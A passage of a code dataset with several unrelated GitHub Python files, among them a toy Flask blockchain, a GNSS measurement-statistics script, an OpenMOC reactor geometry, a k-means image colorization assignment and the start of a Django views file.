remove_surrounding_space.split(' ') \n first_word = lowercase(words[0]) \n capitalized_words = [ capitalize(word) for word in words[ 1: ] ]\n camel_cased_words = [first_word] + capitalized_words\n camel_cased_sentance = ''.join(camel_cased_words)\n return camel_cased_sentance\n\ndef main():\n sentence = input('Enter your sentence: ')\n camelcased = camel_case(sentence)\n print(camelcased)\n\n if __name__ == '__main__':\n main()","repo_name":"jx4515ga/Lab-4-Part1","sub_path":"CamelCase.py","file_name":"CamelCase.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8635939725","text":"## import sha256 library, json, flask and time\r\nfrom hashlib import sha256\r\nfrom flask import Flask, request\r\nimport requests\r\nimport json\r\nimport time\r\n\r\n## Create random strings to fill transactions\r\nimport random\r\nimport string\r\n\r\nclass Block:\r\n \"\"\"\r\n Represents a single Block object\r\n \"\"\"\r\n def __init__(self, index, transactions, timestamp, previous_hash, nonce = 0):\r\n self.index = index\r\n self.transactions = transactions\r\n self.timestamp = timestamp\r\n self.previous_hash = previous_hash\r\n self.nonce = nonce\r\n \r\n def calculate_hash(self):\r\n \"\"\"\r\n Return the hash of the block contents\r\n \"\"\"\r\n block_data = json.dumps(self.__dict__, sort_keys=True)\r\n return sha256(block_data.encode()).hexdigest()\r\n\r\n\r\nclass Blockchain:\r\n \"\"\"\r\n Represents a blockchain\r\n \"\"\"\r\n # Difficulty of PoW (set to 5 for the best effect)\r\n difficulty = 5\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Build the Blockchain with an empty chain/list of unconfirmed transactions.\r\n Create the first block by calling create_genesis_block\r\n \"\"\"\r\n self.unconfirmed_transactions = []\r\n self.chain = []\r\n self.create_genesis_block()\r\n\r\n def create_genesis_block(self):\r\n \"\"\"\r\n Generate the genesis block/first block of the blockchain\r\n \"\"\"\r\n genesis_block = Block(0, [], time.time(), \"0\")\r\n genesis_block.hash = genesis_block.calculate_hash()\r\n self.chain.append(genesis_block)\r\n \r\n @property\r\n def last_block(self):\r\n return self.chain[-1]\r\n \r\n def proof_of_work(self, block):\r\n \"\"\"\r\n Simulate the proof of work process by generating a hash that starts with the correct amount of 0's\r\n \"\"\"\r\n block.nonce = 0\r\n calculated_hash = block.calculate_hash()\r\n \r\n while not calculated_hash.startswith('0' * Blockchain.difficulty):\r\n block.nonce += 1\r\n calculated_hash = block.calculate_hash()\r\n print(calculated_hash)\r\n return calculated_hash\r\n\r\n def add_block(self, block, proof):\r\n previous_hash = self.last_block.hash\r\n if previous_hash != block.previous_hash:\r\n return False\r\n if not self.is_valid_proof(block, proof):\r\n return False\r\n block.hash = proof\r\n self.chain.append(block)\r\n return True\r\n \r\n def is_valid_proof(self, block, block_hash):\r\n return (block_hash.startswith('0' * Blockchain.difficulty) and\r\n block_hash == block.calculate_hash())\r\n \r\n def add_new_transaction(self, transaction):\r\n self.unconfirmed_transactions.append(transaction)\r\n \r\n def mine(self):\r\n ## If there are no unconfirmed transactions, do nothing.\r\n if not self.unconfirmed_transactions:\r\n return False\r\n \r\n last_block = self.last_block\r\n\r\n ## Create a new Block Object\r\n new_block = Block(index=last_block.index + 1, \r\n transactions=self.unconfirmed_transactions,\r\n timestamp=time.time(),\r\n previous_hash=last_block.hash)\r\n \r\n ## Generate the PoW\r\n proof = self.proof_of_work(new_block)\r\n\r\n ## Add the new block (the proof is also checked here before the Block is added to the Blockchain)\r\n self.add_block(new_block, proof)\r\n self.unconfirmed_transactions = []\r\n return new_block.index\r\n\r\n\r\n\"\"\"\r\nThe below starts flask and enables you to start the blockchain and mine new blocks:\r\n1. Start the .py file in command prompt \"python Block.py\".\r\n2. Open a seperate cmd prompt window and run \"curl http://127.0.0.1:5000/chain\" to start a new Blockchain.\r\n3. Then, run the command \"curl http://127.0.0.1:5000/mine\" to mine a new block.\r\n\"\"\"\r\n\r\napp = Flask(__name__)\r\nblockchain = Blockchain()\r\n@app.route('/chain', methods=['GET'])\r\ndef get_chain():\r\n chain_data = []\r\n for block in blockchain.chain:\r\n chain_data.append(block.__dict__)\r\n return json.dumps({\"length\": len(chain_data),\r\n \"chain\": chain_data})\r\n\r\n@app.route('/mine', methods=['GET'])\r\ndef mine_a_block():\r\n letters = string.ascii_lowercase\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n blockchain.mine()\r\n chain_data = []\r\n for block in blockchain.chain:\r\n chain_data.append(block.__dict__)\r\n return json.dumps({\"length\": len(chain_data),\r\n \"chain\": chain_data[-1]})\r\n \r\n\r\napp.run(debug=True, port=5000)","repo_name":"mattycoles/Python_Blockchain","sub_path":"Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12536996446","text":"import matplotlib.pyplot as plt\nfrom pyproj import Proj, transform\nfrom pyproj import Transformer\nimport matplotlib.image as img\nimport numpy as np\n\n\n#### Grandeurs utilies\n\n# x=alpha*E +beta*N + ct1\nalpha = 0.622672164\nbeta = -0.093309478\nct1 = 546305.0875\n\n# y=gamma*E +delta*N + ct2\ngamma = -0.046338701\ndelta = -0.620534551\ncte2 = 4251139.032\n\ndef deg_to_Lamb(x1, y1):\n transformer = Transformer.from_crs(4326, 2154, always_xy=True)\n points = [(x1, y1)]\n for pt in transformer.itransform(points):\n return pt\n\n\ndef conversion_pour_image(E, N):\n x = alpha * E + beta * N + ct1\n y = gamma * E + delta * N + cte2\n return x, y\n\ndef stats_horizontal(nb_mesures, fichiers, ref, titre):\n GPA = []\n for i in range(nb_mesures):\n fich = open(fichiers[i], \"r\")\n lignes = fich.readlines()\n for ligne in lignes:\n if '$GPGGA' in ligne:\n GPA.append(ligne)\n\n liste_lat = []\n liste_long = []\n liste_Xlamb = []\n liste_Ylamb = []\n\n for mesure in GPA:\n mes = mesure.split(\",\")[2:6]\n if mes[1] == 'N':\n liste_long.append(float(mes[0][0:2]) + (float(mes[0][2:])) / 60)\n else:\n liste_long.append(-float(mes[0][0:2]) - (float(mes[0][2:])) / 60)\n if mes[3] == 'E':\n liste_lat.append(float(mes[2][0:3]) + (float(mes[2][3:])) / 60)\n else:\n liste_lat.append(-float(mes[2][0:3]) - (float(mes[2][3:])) / 60)\n\n for i in range(len(liste_lat)):\n X, Y = deg_to_Lamb(liste_lat[i], liste_long[i])\n liste_Xlamb.append(X)\n liste_Ylamb.append(Y)\n\n #moyenne des mesures\n m_x = np.mean(liste_Xlamb)\n m_y = np.mean(liste_Ylamb)\n plt.plot(m_x, m_y, 'og', label='moyenne')\n if ref == 8000:\n x_ref, y_ref = 147787.422, 6839274.663 # 8000\n else:\n x_ref, y_ref = 147788.609, 6839279.724 # 9000\n\n\n plt.plot(x_ref, y_ref, \"or\", label='réference')\n\n for i in range(len(liste_Ylamb)):\n plt.plot(liste_Xlamb[i], liste_Ylamb[i], \"+b\")\n plt.title(titre)\n plt.legend()\n\n biais = np.sqrt((m_x-x_ref)**2+(m_y-y_ref)**2)\n fid = np.sqrt(np.std(liste_Xlamb)**2 + np.std(liste_Ylamb)**2)\n prec = np.sqrt(biais**2 + fid**2)\n print('biais : ',biais, ' m') #Justesse\n print('Fidélité : ', fid, 'm')\n print('Précision : ', prec, 'm')\n plt.show()\n\ndef stats_vertical(fichier1,fichier2, titre):\n GGA1 = []\n GGA2 = []\n altitude1 = []\n altitude2 = []\n fich1 = open(fichier1, \"r\")\n fich2 = open(fichier2, \"r\")\n lignes1 = fich1.readlines()\n lignes2 = fich2.readlines()\n for ligne in lignes1:\n if '$GPGGA' in ligne:\n GGA1.append(ligne.split(','))\n for ligne in lignes2:\n if '$GPGGA' in ligne:\n GGA2.append(ligne.split(','))\n\n for i in range(len(GGA1)):\n try:\n altitude1.append(float(GGA1[i][-6]) - float(GGA1[i][-4]))\n except:\n pass\n for i in range(len(GGA2)):\n try:\n altitude2.append(float(GGA2[i][-6]) - float(GGA2[i][-4]))\n except:\n pass\n\n nb_mesures1 = len(altitude1)\n nb_mesures2 = len(altitude2)\n altitude1 = np.array(altitude1)\n altitude2 = np.array(altitude2)\n\n # stats des mesures\n m_1 = np.mean(altitude1)\n m_2 = np.mean(altitude2)\n fid1 = np.std(altitude1)\n fid2 = np.std(altitude2)\n\n nb_mesures = max(nb_mesures1, nb_mesures2)\n x = np.linspace(1, nb_mesures, nb_mesures)\n plt.plot(x, m_1*np.linspace(1, 1, nb_mesures), 'r', label=fichier1)\n plt.plot(x, m_2 * np.linspace(1, 1, nb_mesures), 'g', label= fichier2)\n plt.plot(x, (m_1 - fid1)*np.linspace(1, 1, nb_mesures), '--r')\n plt.plot(x, (m_1 + fid1)*np.linspace(1, 1, nb_mesures), '--r')\n plt.plot(x, (m_2 - fid2) * np.linspace(1, 1, nb_mesures), '--g')\n plt.plot(x, (m_2 + fid2) * np.linspace(1, 1, nb_mesures), '--g')\n\n for i in range(nb_mesures1):\n plt.plot(i, altitude1[i], \"+k\")\n\n for i in range(nb_mesures2):\n plt.plot(i, altitude2[i], \"+b\")\n plt.title(titre)\n plt.xlabel = 'mesure'\n plt.ylabel = 'altitude [m]'\n plt.legend()\n\n print('Fidélité '+fichier1+' : ', fid1, 'm')\n print('Fidélité '+fichier2+' : ', fid2, 'm')\n\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n #stats_horizontal(2, (\"UV24_L_Proflex_8000.txt\", \"UV24_V_Proflex_8000.txt\"), 8000, 'Acquisition Proflex 8000')\n stats_vertical('..\\\\files\\\\mesures_stat\\\\UE24_SP80_20210602_EB06.txt', '..\\\\files\\\\mesures_stat\\\\EB06_GSTAR_11h40.txt', 'Altitude Proflex')\n #stats_vertical('UV24_V_GStarIV_8000.txt', 'UV24_L_Proflex_8000.txt', 'Altitude 8000')","repo_name":"CorentinGoet/Projet_Systeme_1A","sub_path":"python files/old/analyse_metrologique.py","file_name":"analyse_metrologique.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34987160835","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 22 19:32:18 2021\r\n\r\n@author: Caroline\r\n\"\"\"\r\n\r\n#Crear Archivo\r\n#\\n: Salto de línea\r\n#W: Escritura\r\n#A: Adiciona líneas nuevas, respeta las actuales\r\n#R: Modo de lectura\r\n\r\n#Crear Archivo\r\ndef crearArchivo():\r\n docu=open('file.txt', 'w')\r\n docu.close()\r\n\r\n#Escribir Archivo\r\ndef abrirArchivo():\r\n docu=open('file.txt', 'a')\r\n docu.write('Nana\\n')\r\n docu.write('Coffee')\r\n docu.close()\r\n \r\n#Leer Archivo\r\ndef leerArchivo():\r\n docu=open('file.txt', 'r')\r\n line=docu.readline()\r\n \r\n while line != \"\":\r\n print(line)\r\n line=docu.readline()\r\n \r\n docu.close()\r\n\r\n \r\n#crearArchivo() \r\n#abrirArchivo()\r\nleerArchivo()\r\n","repo_name":"carolineprada/Python-Medium","sub_path":"open_file.py","file_name":"open_file.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4617886620","text":"import openmoc\n\n###############################################################################\n# Main Simulation Parameters\n###############################################################################\n\nopenmoc.log.set_log_level('NORMAL')\n\n\n###############################################################################\n# Creating Materials\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Importing materials data from HDF5...')\n\nmaterials = openmoc.materialize.load_from_hdf5('LRA-mgxs.h5', '')\n\n\n###############################################################################\n# Creating Surfaces\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Creating surfaces...')\n\nleft = openmoc.XPlane(x=-82.5)\nright = openmoc.XPlane(x=82.5)\nbottom = openmoc.YPlane(y=-82.5)\ntop = openmoc.YPlane(y=82.5)\nleft.setBoundaryType(openmoc.REFLECTIVE)\nright.setBoundaryType(openmoc.VACUUM)\nbottom.setBoundaryType(openmoc.REFLECTIVE)\ntop.setBoundaryType(openmoc.VACUUM)\n\n\n###############################################################################\n# Creating Cells and Universes\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Creating cells...')\n\n# Region 1\nregion1_cell = openmoc.Cell(name='region 1')\nregion1_cell.setFill(materials['region_1'])\nregion1 = openmoc.Universe(name='region 1')\nregion1.addCell(region1_cell)\n\n# Region 2\nregion2_cell = openmoc.Cell(name='region 2')\nregion2_cell.setFill(materials['region_2'])\nregion2 = openmoc.Universe(name='region 2')\nregion2.addCell(region2_cell)\n\n# Region 3\nregion3_cell = openmoc.Cell(name='region 3')\nregion3_cell.setFill(materials['region_3'])\nregion3 = openmoc.Universe(name='region 3')\nregion3.addCell(region3_cell)\n\n# Region 4\nregion4_cell = openmoc.Cell(name='region 4')\nregion4_cell.setFill(materials['region_4'])\nregion4 = openmoc.Universe(name='region 4')\nregion4.addCell(region4_cell)\n\n# Region 5\nregion5_cell = openmoc.Cell(name='region 5')\nregion5_cell.setFill(materials['region_5'])\nregion5 = openmoc.Universe(name='region 5')\nregion5.addCell(region5_cell)\n\n# Region 5\nregion6_cell = openmoc.Cell(name='region 6')\nregion6_cell.setFill(materials['region_6'])\nregion6 = openmoc.Universe(name='region 6')\nregion6.addCell(region6_cell)\n\n# Cells\nassembly1_cell = openmoc.Cell(name='assembly 1')\nassembly2_cell = openmoc.Cell(name='assembly 2')\nassembly3_cell = openmoc.Cell(name='assembly 3')\nassembly4_cell = openmoc.Cell(name='assembly 4')\nassembly5_cell = openmoc.Cell(name='assembly 5')\nassembly6_cell = openmoc.Cell(name='assembly 6')\n\nassembly1 = openmoc.Universe(name='assembly 1')\nassembly2 = openmoc.Universe(name='assembly 2')\nassembly3 = openmoc.Universe(name='assembly 3')\nassembly4 = openmoc.Universe(name='assembly 4')\nassembly5 = openmoc.Universe(name='assembly 5')\nassembly6 = openmoc.Universe(name='assembly 6')\n\nassembly1.addCell(assembly1_cell)\nassembly2.addCell(assembly2_cell)\nassembly3.addCell(assembly3_cell)\nassembly4.addCell(assembly4_cell)\nassembly5.addCell(assembly5_cell)\nassembly6.addCell(assembly6_cell)\n\n# Root cell/universe\nroot_cell = openmoc.Cell(name='root cell')\nroot_cell.addSurface(halfspace=+1, surface=left)\nroot_cell.addSurface(halfspace=-1, surface=right)\nroot_cell.addSurface(halfspace=+1, surface=bottom)\nroot_cell.addSurface(halfspace=-1, surface=top)\n\nroot_universe = openmoc.Universe(name='root universe')\nroot_universe.addCell(root_cell)\n\n\n###############################################################################\n# Creating Lattices\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Creating LRA lattices...')\n\n# Assembly 1\nassembly1_lattice = openmoc.Lattice(name='assembly 1')\nassembly1_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region1] * 10] * 10\nassembly1_lattice.setUniverses([template])\nassembly1_cell.setFill(assembly1_lattice)\n\n# Assembly 2\nassembly2_lattice = openmoc.Lattice(name='assembly 2')\nassembly2_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region2] * 10] * 10\nassembly2_lattice.setUniverses([template])\nassembly2_cell.setFill(assembly2_lattice)\n\n# Assembly 3\nassembly3_lattice = openmoc.Lattice(name='assembly 3')\nassembly3_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region3] * 10] * 10\nassembly3_lattice.setUniverses([template])\nassembly3_cell.setFill(assembly3_lattice)\n\n# Assembly 4\nassembly4_lattice = openmoc.Lattice(name='assembly 4')\nassembly4_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region4] * 10] * 10\nassembly4_lattice.setUniverses([template])\nassembly4_cell.setFill(assembly4_lattice)\n\n# Assembly 5\nassembly5_lattice = openmoc.Lattice(name='assembly 5')\nassembly5_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region5] * 10] * 10\nassembly5_lattice.setUniverses([template])\nassembly5_cell.setFill(assembly5_lattice)\n\n# Assembly 6\nassembly6_lattice = openmoc.Lattice(name='assembly 6')\nassembly6_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region6] * 10] * 10\nassembly6_lattice.setUniverses([template])\nassembly6_cell.setFill(assembly6_lattice)\n\n# Full core\ncore_lattice = openmoc.Lattice(name='core')\ncore_lattice.setWidth(width_x=15.0, width_y=15.0)\n\nuniverses = {7 : assembly1, 8 : assembly2, 9: assembly3,\n 10 : assembly4, 11 : assembly5, 12 : assembly6}\ntemplate = [[12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12],\n [12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12],\n [ 9, 9, 9, 9, 9, 9, 9, 12, 12, 12, 12],\n [ 9, 9, 9, 9, 9, 9, 9, 10, 12, 12, 12],\n [ 8, 7, 7, 7, 7, 8, 8, 11, 11, 12, 12],\n [ 8, 7, 7, 7, 7, 8, 8, 11, 11, 12, 12],\n [ 7, 7, 7, 7, 7, 7, 7, 9, 9, 12, 12],\n [ 7, 7, 7, 7, 7, 7, 7, 9, 9, 12, 12],\n [ 7, 7, 7, 7, 7, 7, 7, 9, 9, 12, 12],\n [ 7, 7, 7, 7, 7, 7, 7, 9, 9, 12, 12],\n [ 8, 7, 7, 7, 7, 8, 8, 9, 9, 12, 12]]\n\nfor i in range(11):\n for j in range(11):\n template[i][j] = universes[template[i][j]]\ncore_lattice.setUniverses([template])\nroot_cell.setFill(core_lattice)\n\n\n###############################################################################\n# Creating the Geometry\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Creating geometry...')\n\ngeometry = openmoc.Geometry()\ngeometry.setRootUniverse(root_universe)\n","repo_name":"mit-crpg/OpenMOC","sub_path":"sample-input/benchmarks/LRA/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"53"} +{"seq_id":"26980510286","text":"# patch : 3 x 3 patch where the center pixel is the pixel we want to predict\n# representative_colors: 5 colors that represents all the color in the original image\n# grey_image: original image in a greyscaled\nimport time\nfrom collections import Counter\nfrom queue import PriorityQueue\nimport heapq\nimport numpy as np\nimport sys\nimport cv2\nimport matplotlib.pyplot as plt\nimport statistics\nfrom statistics import mode\nfrom scipy import stats\nimport random\n\ndef eclud_dist(centroid, data_pnt):\n return np.linalg.norm(centroid - data_pnt)\n\n\ndef kmeans(input):\n colors = []\n id = list(range(0, len(input)))\n datapnts = {k: v for (k, v) in zip(id, input)}\n\n cluster_dict = {}\n for x in range(1, 6):\n r = np.random.randint(255)\n g = np.random.randint(255)\n b = np.random.randint(255)\n current = np.array([r, g, b])\n previous = np.array([-1, -1, -1])\n cluster_dict[x] = []\n cluster_dict[x].append(current)\n cluster_dict[x].append(previous)\n # while the current and previous dont equal each other, just keep averaging the data pnts related to cluster\n '''for each data pnt, assign it to a centroid, then when they are assigned, calculate average for each cluster, \n and set as new centroid, check for convergence repeat'''\n final_clust_data = {}\n while not convergence(cluster_dict):\n # stores which datapnt belong to which cluster\n clust_data = {}\n\n for x in range(1, 6):\n clust_data[x] = []\n for datapnts_id in datapnts.keys():\n data = datapnts[datapnts_id]\n min_num = sys.maxsize\n min_cluster = -1\n # determine which cluster\n for key in cluster_dict.keys():\n value = cluster_dict[key]\n # print('COLOR '+str(data))\n temp = eclud_dist(value[0], data)\n if temp <= min_num:\n min_cluster = key\n min_num = temp\n clust_data[min_cluster].append(datapnts_id)\n # This is for replacing the current cluster pnt with the average of data pnts + replacing previous cluster pnt\n for key in clust_data.keys():\n value = clust_data[key]\n tmplst = []\n for data_id in value:\n tmplst.append(datapnts[data_id])\n a = tmplst\n if len(tmplst) > 0:\n average = np.mean(a, axis=0)\n # print(' Average of:' + str(a) + 'is ' + str(average))\n previous = cluster_dict[key][0]\n cluster_dict[key][0] = average\n cluster_dict[key][1] = previous\n else:\n previous = cluster_dict[key][0]\n cluster_dict[key][0] = np.array([-1, -1, -1])\n cluster_dict[key][1] = previous\n final_cluster_data = clust_data\n for key in cluster_dict.keys():\n colors.append(cluster_dict[key][0])\n print(\"finish\" + str(len(colors)))\n return colors, final_cluster_data\n\n # while not np.array_equal(previous,current):\n\n\ndef convergence(cluster_dict):\n for value in cluster_dict.values():\n if not np.array_equal(value[0], value[1]):\n return False\n return True\n\n\n# def main():\n# img = cv2.imread('imgs/left.jpg')\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n# # img[0:150, 0:300] = [0, 255, 0]\n#\n# cluster_input = img.reshape((img.shape[1] * img.shape[0], 3))\n# colors, cluster_dict = kmeans(cluster_input)\n#\n# h = img.shape[0]\n# w = img.shape[1]\n# for y in range(0, h):\n# for x in range(0, w):\n# min = sys.maxsize\n# tmpcolor = [0, 0, 0]\n# for color in colors:\n# dist = eclud_dist(img[y, x], color)\n# if min > dist:\n# min = dist\n# tmpcolor = color\n# img[y, x] = tmpcolor\n#\n# plt.imshow(img)\n# plt.show()\n# # ///////////////////////////////////////////////////////////////////////\n# # recolor the right side of the image\n# '''\n# We analyze the greyscale of both the right and left, for each pixel on right side, take a patch surrounding\n# that pixel and find 6 patches on the left side most similar to that pixel\n# '''\n# greyR = cv2.imread('imgs/grayRight.jpg')\n# greyL = cv2.imread('imgs/grayLeft.jpg')\n# greydict = {}\n# h = greyL.shape[0]\n# w = greyL.shape[1]\n# # assign neighbors for all the leftside\n# for i in range(2, h - 1):\n# for j in range(2, w - 1, 3):\n# tmplst = [greyL[i + 1, j],\n# greyL[i - 1, j],\n# greyL[i, j + 1],\n# greyL[i, j - 1],\n# greyL[i - 1, j - 1],\n# greyL[i + 1, j - 1],\n# greyL[i - 1, j + 1],\n# greyL[i + 1, j + 1],\n# greyL[i, j]]\n# flat_list = np.array(np.concatenate(tmplst).flat)\n# greydict[(i, j)] = flat_list\n# o = greyR.shape[0]\n# p = greyR.shape[1]\n# # compute each pixel and predict color\n# for i in range(2, o - 1):\n# for j in range(2, p - 1):\n# print(i)\n# tmplst = [greyR[i + 1, j],\n# greyR[i - 1, j],\n# greyR[i, j + 1],\n# greyR[i, j - 1],\n# greyR[i - 1, j - 1],\n# greyR[i + 1, j - 1],\n# greyR[i - 1, j + 1],\n# greyR[i + 1, j + 1],\n# greyR[i, j]]\n# flat_list = np.array(np.concatenate(tmplst).flat)\n# pqe = PriorityQueue()\n# for key in greydict.keys():\n# dist = eclud_dist(flat_list, greydict[key])\n# pqe.put((dist, key))\n# clst = []\n# nclst = []\n# priolst = []\n# for x in range(6):\n# patch = pqe.get()\n# q, z = patch[1]\n# color = img[q, z]\n# clst.append(color)\n# print(color)\n# print(clst)\n# m = stats.mode(clst)\n# mode1 = m[0]\n# for x in range(len(clst)):\n# comparison = clst[x] == m[0]\n# equal_arrays = comparison.all()\n# # print(equal_arrays)\n# if not equal_arrays:\n# clst.append(clst[x])\n# y = stats.mode(nclst)\n# mode2 = y[0]\n# if y[1] == m[1]:\n# for x in range(len(clst)):\n# popped = clst.pop()\n# if popped == mode1:\n# greyR[i, j] = mode2\n# if popped == mode2:\n# greyR[i, j] = mode1\n# break\n# else:\n# greyR[i, j] = mode1\n#\n# plt.imshow(greyR)\n# plt.show()\n# lst = []\n# # lst = [np.array([0,0,0]),np.array([255,255,255]),np.array([51,51,51]),np.array([51,51,51]),np.array([51,51,51]),np.array([51,51,51]),np.array([102,102,102]),np.array([153,153,153]),np.array([0,0,153]),np.array([0,0,153]),np.array([0,0,153])]\n# # m = stats.mode(lst)\n# # flat_list = np.array(np.concatenate(m[0]).flat)\n# # # print(flat_list)\n# # nlst = []\n# # # for arr in lst:\n# # # print(arr)\n# # # comparison = arr == m[0]\n# # # # print(comparison)\n# # # equal_arrays = comparison.all()\n# # # print(equal_arrays)\n# # # # if not equal_arrays:\n# # # # lst.append(arr)\n# # for x in range(len(lst)):\n# # comparison = lst[x] == m[0]\n# # equal_arrays = comparison.all()\n# # # print(equal_arrays)\n# # if not equal_arrays:\n# # nlst.append(lst[x])\n# # y = stats.mode(nlst)\n#\n# # for x in range(10):\n# # lst.append(np.random.randint(low=0, high=255, size=3))\n# # print(lst)\n# # print(kmeans(lst))\n\ndef get_patches(img):\n patches=[]\n #iterate through grayleft\n #iterate through rows\n for i in range(1,len(img)-1):\n #iterate through columns\n for j in range(1,len(img[0])-1):\n patches.append((img[i-1:i+2,j-1:j+2],(i,j)))\n\n return patches\ndef main():\n img = cv2.imread('imgs/left.jpg')\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # img[0:150, 0:300] = [0, 255, 0]\n\n cluster_input = img.reshape((img.shape[1] * img.shape[0], 3))\n img2 = cv2.imread('imgs/right.jpg')\n img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2RGB)\n colors, cluster_dict = kmeans(cluster_input)\n\n h = img.shape[0]\n w = img.shape[1]\n for y in range(0, h):\n for x in range(0, w):\n min = sys.maxsize\n tmpcolor = [0, 0, 0]\n for color in colors:\n dist = eclud_dist(img[y, x], color)\n if min > dist:\n min = dist\n tmpcolor = color\n img[y, x] = tmpcolor\n\n h = img2.shape[0]\n w = img2.shape[1]\n for y in range(0, h):\n for x in range(0, w):\n min = sys.maxsize\n tmpcolor = [0, 0, 0]\n for color in colors:\n dist = eclud_dist(img2[y, x], color)\n if min > dist:\n min = dist\n tmpcolor = color\n img2[y, x] = tmpcolor\n plt.imshow(combine(img,img2))\n plt.show()\n\n # ///////////////////////////////////////////////////////////////////////\n # recolor the right side of the image\n '''\n We analyze the greyscale of both the right and left, for each pixel on right side, take a patch surrounding\n that pixel and find 6 patches on the left side most similar to that pixel\n '''\n greyR = cv2.imread('imgs/grayRight.jpg')\n greyL = cv2.imread('imgs/grayLeft.jpg')\n greyLp = get_patches(greyL)\n\n for i in range(1, len(greyR) - 1):\n # iterate through columns\n for j in range(1, len(greyR[0]) - 1):\n print(i)\n patch = greyR[i - 1:i + 2, j - 1:j + 2]\n samples = random.sample(list(greyLp), 1000)\n pqe = PriorityQueue()\n for sample in samples:\n dist = eclud_dist(sample[0], greyR[i - 1:i + 2, j - 1:j + 2])\n pqe.put((dist,sample[1]))\n closestNeighbor = []\n for x in range(6):\n popped = pqe.get()\n closestNeighbor.append(popped)\n # print(closestNeighbor)\n cl = []\n for patch in closestNeighbor:\n x, y = patch[1]\n color = img[x,y]\n cl.append(color)\n mode1 = stats.mode(cl)\n mode1color = mode1[0]\n print(\"mode1 =\" + str(mode1))\n nlst = []\n for patch in closestNeighbor:\n x, y = patch[1]\n color = img[x, y]\n comparison = color == mode1color\n equal_arrays = comparison.all()\n if not equal_arrays:\n nlst.append(color)\n mode2 = stats.mode(nlst)\n mode2color = mode2[0]\n print(\"cnt of mode1\"+ str(mode1[1])+\"\\tcnt of mode2:\" +str(mode2[1]))\n if len(mode2[1]) > 0:\n cnt1 = np.array(np.concatenate(mode1[1]).flat)\n cnt2 = np.array(np.concatenate(mode2[1]).flat)\n\n comp = cnt1 == cnt2\n e = comp.all()\n print(e)\n if e:\n for ptr in closestNeighbor:\n popped = closestNeighbor.pop()\n if popped == mode1color:\n greyR[i,j] = mode2color\n break\n if popped == mode2color:\n greyR[i,j] = mode1color\n else:\n greyR[i,j] = mode1color\n\n plt.imshow(combine(img,greyR))\n plt.show()\n calculatediff(img2,greyR)\n\ndef combine(left,right):\n combined = []\n for i in range(0, len(left)):\n combined.append(list(left[i]) + list(right[i]))\n return combined\n\ndef calculatediff(img,predicted_image):\n numPixel = len(img)*len(img[1])\n correct = 0\n for i in range(0,len(img)):\n for j in range(0,len(img[1])):\n comparison = img[i,j] == predicted_image[i,j]\n equal_arrays = comparison.all()\n if equal_arrays:\n correct +=1\n print(str(1-(correct/numPixel))+\" correctness\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"al1168/AI_Colorization","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":12603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35158718337","text":"def solution(n,a,b):\n answer = 0\n a=a-1\n b=b-1\n while a//2!=b//2:\n a=a//2\n b=b//2\n answer+=1\n answer+=1\n return answer","repo_name":"yooooonzzzzzang/Algo_seed","sub_path":"프로그래머스/lv2/12985. 예상 대진표/예상 대진표.py","file_name":"예상 대진표.py","file_ext":"py","file_size_in_byte":157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42661698615","text":"import simplejson\nimport os\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.markup.templatetags.markup import restructuredtext\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import get_object_or_404, render_to_response, redirect\nfrom django.template import RequestContext\nfrom django.template.defaultfilters import linebreaks\nfrom django.template.loader import render_to_string\nfrom django.views.generic.list_detail import object_list\n\nfrom projects import constants\nfrom projects.forms import FileForm, CreateProjectForm, ImportProjectForm, FileRevisionForm\nfrom projects.models import Project, File\n\nfrom bookmarks.models import Bookmark\n\n\n@login_required\ndef project_dashboard(request):\n \"\"\"\n A dashboard! If you aint know what that means you aint need to.\n Essentially we show you an overview of your content.\n \"\"\"\n marks = 